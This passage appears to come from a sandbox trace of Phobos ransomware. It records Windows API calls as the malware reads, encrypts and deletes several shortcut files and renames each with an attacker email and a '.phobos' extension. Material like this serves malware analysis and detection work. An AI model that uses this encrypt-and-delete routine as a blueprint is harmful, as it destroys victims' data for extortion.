pdwDataLen=0x2c9fb68*=0xa10, dwBufLen=0xa10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa10) returned 1 [0200.527] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa10, lpOverlapped=0x0) returned 1 [0200.528] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.528] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.528] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.528] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.528] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.528] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.528] CloseHandle (hObject=0x124) returned 1 [0200.528] CloseHandle (hObject=0xfc) returned 1 [0200.529] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cyb_du.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cyb_du.lnk")) returned 1 [0200.530] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c_3uVV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\c_3uvv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.531] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2564) returned 1 [0200.531] CloseHandle (hObject=0xfc) returned 1 [0200.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c_3uVV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\c_3uvv.lnk")) returned 0x20 [0200.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c_3uVV.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\c_3uvv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c_3uVV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\c_3uvv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.531] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.531] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c_3uVV.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\c_3uvv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.532] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.532] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.532] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa04, lpOverlapped=0x0) returned 1 [0200.533] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa10, dwBufLen=0xa10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa10) returned 1 [0200.534] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa10, lpOverlapped=0x0) returned 1 [0200.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.534] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.534] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.534] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.534] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.534] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.534] CloseHandle (hObject=0xfc) returned 1 [0200.535] CloseHandle (hObject=0x124) returned 1 [0200.535] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c_3uVV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\c_3uvv.lnk")) returned 1 [0200.535] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D07wOtkP4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\d07wotkp4.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.536] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=474) returned 1 [0200.536] CloseHandle (hObject=0x124) returned 1 [0200.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D07wOtkP4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\d07wotkp4.lnk")) returned 0x20 [0200.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D07wOtkP4.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\d07wotkp4.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D07wOtkP4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\d07wotkp4.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.537] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.537] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D07wOtkP4.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\d07wotkp4.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.537] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.537] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.538] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1da, lpOverlapped=0x0) returned 1 [0200.538] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0) returned 1 [0200.538] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1e0, lpOverlapped=0x0) returned 1 [0200.539] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.539] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.539] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.539] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.539] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.539] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.540] CloseHandle (hObject=0x124) returned 1 [0200.540] CloseHandle (hObject=0xfc) returned 1 [0200.540] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\D07wOtkP4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\d07wotkp4.lnk")) returned 1 [0200.540] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DeNpiK9Oud.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\denpik9oud.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.541] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=8383) returned 1 [0200.541] CloseHandle (hObject=0xfc) returned 1 [0200.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DeNpiK9Oud.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\denpik9oud.lnk")) returned 0x20 [0200.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DeNpiK9Oud.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\denpik9oud.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DeNpiK9Oud.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\denpik9oud.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.541] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.541] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DeNpiK9Oud.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\denpik9oud.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.542] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.542] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.542] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x20bf, lpOverlapped=0x0) returned 1 [0200.544] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20c0, dwBufLen=0x20c0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20c0) returned 1 [0200.544] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20c0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20c0, lpOverlapped=0x0) returned 1 [0200.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.545] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.545] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.545] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.545] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.545] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.545] CloseHandle (hObject=0xfc) returned 1 [0200.545] CloseHandle (hObject=0x124) returned 1 [0200.545] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DeNpiK9Oud.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\denpik9oud.lnk")) returned 1 [0200.546] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dHAzF3f9DE9t2ADhYIoo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dhazf3f9de9t2adhyioo.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.547] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2725) returned 1 [0200.547] CloseHandle (hObject=0x124) returned 1 [0200.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dHAzF3f9DE9t2ADhYIoo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dhazf3f9de9t2adhyioo.lnk")) returned 0x20 [0200.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dHAzF3f9DE9t2ADhYIoo.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dhazf3f9de9t2adhyioo.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dHAzF3f9DE9t2ADhYIoo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dhazf3f9de9t2adhyioo.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.547] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.547] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dHAzF3f9DE9t2ADhYIoo.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dhazf3f9de9t2adhyioo.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.548] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.548] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.548] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xaa5, lpOverlapped=0x0) returned 1 [0200.550] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xab0, dwBufLen=0xab0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xab0) returned 1 [0200.550] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xab0, lpOverlapped=0x0) returned 1 [0200.551] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.551] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.551] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0200.551] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.551] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0200.551] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.551] CloseHandle (hObject=0x124) returned 1 [0200.551] CloseHandle (hObject=0xfc) returned 1 [0200.551] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dHAzF3f9DE9t2ADhYIoo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dhazf3f9de9t2adhyioo.lnk")) returned 1 [0200.552] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DSJNb7yWzXXdM9R.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dsjnb7ywzxxdm9r.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.553] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3598) returned 1 [0200.553] CloseHandle (hObject=0xfc) returned 1 [0200.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DSJNb7yWzXXdM9R.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dsjnb7ywzxxdm9r.lnk")) returned 0x20 [0200.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DSJNb7yWzXXdM9R.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dsjnb7ywzxxdm9r.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DSJNb7yWzXXdM9R.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dsjnb7ywzxxdm9r.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.554] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.554] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DSJNb7yWzXXdM9R.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dsjnb7ywzxxdm9r.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.555] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.555] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.555] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, 